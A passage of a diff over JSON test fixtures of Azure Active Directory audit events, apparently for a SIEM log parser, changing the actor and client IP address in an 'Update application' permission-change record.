operties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": 
true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -32,9 +32,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { 
@@ -237,7 +237,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": 
true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -267,9 +267,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:33:26", "ExtendedProperties": [ { 
@@ -472,7 +472,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
